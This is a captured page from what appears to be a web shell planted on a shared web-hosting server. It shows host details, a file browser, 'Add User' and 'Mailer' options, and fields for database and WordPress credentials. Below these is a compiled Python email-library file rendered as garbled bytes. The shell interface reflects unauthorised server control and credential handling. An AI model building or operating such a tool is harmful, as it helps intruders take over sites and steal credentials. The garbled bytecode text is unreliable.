System
:
Linux premium315.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
Software
:
LiteSpeed
Server
:
66.29.137.158
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python3.6
/
email
/
__pycache__
/
216.73.216.222
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for aiwebcrafts.com made by tabagkayu.
Folder Name
File Name
File Content
File
generator.cpython-36.pyc
3 ��i�S � @ s� d Z dddgZddlZddlZddlZddlZddlmZ ddlm Z m Z ddlmZ dd l mZ d ZdZejd�Zejd ej�Zejd�Zejd�ZG dd� d�ZG dd� de�ZdZG dd� de�Zeeejd ��Zde Zej Z dS )z:Classes to generate plain text from a message object tree.� Generator�DecodedGenerator�BytesGenerator� N)�deepcopy)�StringIO�BytesIO)�_has_surrogates)�HeaderWriteError�_� z \r\n|\r|\nz^From z\r\n[^ \t]|\r[^ \n\t]|\n[^ \t]s \r\n[^ \t]|\r[^ \n\t]|\n[^ \t]c @ s� e Zd ZdZd'dd�dd�Zdd� Zd(d d �Zdd� Zd d� Zdd� Z dd� Z dd� Zdd� Zdd� Z dd� ZeZdd� Zdd� Zdd � Zd!d"� Zed)d#d$��Zed%d&� �ZdS )*r z�Generates output from a Message object tree. This basic generator writes the message to the given file object as plain text. N)�policyc C s6 |dkr|dkrdn|j }|| _|| _|| _|| _dS )a� Create the generator for message flattening. outfp is the output file-like object for writing the message to. It must have a write() method. Optional mangle_from_ is a flag that, when True (the default if policy is not set), escapes From_ lines in the body of the message by putting a `>' in front of them. Optional maxheaderlen specifies the longest length for a non-continued header. When a header line is longer (in characters, with tabs expanded to 8 spaces) than maxheaderlen, the header will split as defined in the Header class. Set maxheaderlen to zero to disable header wrapping. The default is 78, as recommended (but not required) by RFC 2822. The policy keyword specifies a policy object that controls a number of aspects of the generator's operation. If no policy is specified, the policy associated with the Message object passed to the flatten method is used. NT)�mangle_from_�_fp� _mangle_from_�maxheaderlenr )�self�outfpr r r � r �'/usr/lib64/python3.6/email/generator.py�__init__'